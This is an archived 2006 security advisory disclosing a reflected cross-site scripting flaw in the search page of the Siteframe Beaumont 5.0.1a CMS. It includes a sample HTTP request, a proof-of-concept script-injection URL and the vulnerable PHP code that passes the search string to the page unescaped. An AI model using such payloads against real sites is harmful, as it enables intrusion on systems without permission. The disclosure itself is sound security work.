Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11420
HistoryFeb 14, 2006 - 12:00 a.m.

Siteframe Beaumont 5.0.1a <== Cross-Site Scripting Vulnerability

2006-02-1400:00:00
vulners.com
9
JSON

Hi,
I'm Kiki and I would signal you a XSS in the CMS Siteframe Beaumont 5.0.1a
I enclose the advisory and the origina is here:
http://kiki91.altervista.org/exploit/siteframe5.0.1a_xss.txt
Bye bye

Kiki

p.s: sorry for my bad English but I'm Italian ;)

Advisory:

Siteframe Beaumont 5.0.1a <== Cross-Site Scripting Vulnerability

##########################

Information of Software:

Software: Siteframe Beaumont 5.0.1a
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management
system designed for the rapid deployment of community-based websites.
With Siteframe,a group of users can share stories and photographs, create blogs,
send email to one another, and participate in group activities.

##########################

Bug:

Siteframe contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in the search page and the user can modify the
function GET and insert the XSS code.

  • http get request

http://[target]/search.php?q=casa
GET /search.php?q=casa
Host: siteframe.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

but we can modify the request GET in this way:

http://[target]/search.php?q=[XSS]
GET /search.php?q=[XSS]

Example:

http://[target]/search.php?q=[XSS]

or a practical example:

http://[target]/search.php?q=<script>alert("lol");</script>

The bug is in this part of code of search.php :

[…]
if (isset($_GET['q']))
{
$PAGE->assign('page_title', lang('page_title_search_results'));

$pattern = $_GET[&#39;q&#39;];
$PAGE-&gt;assign&#40;&#39;search_string&#39;, $_GET[&#39;q&#39;]&#41;;

// build query
$stext = new SearchText;
$q = sprintf&#40;
        $__QUERY, 
        addslashes&#40;$_GET[&#39;q&#39;]&#41;,
        $stext-&gt;table_name&#40;&#41;,
        addslashes&#40;$_GET[&#39;q&#39;]&#41;
&#41;;

$PAGE-&gt;assign&#40;&#39;sql_query&#39;, $q&#41;;

[…]

##########################

Credit:

Author: Kiki
e-mail: [email protected]
web page: http://www.kiki91.altervista.org

##########################

JSON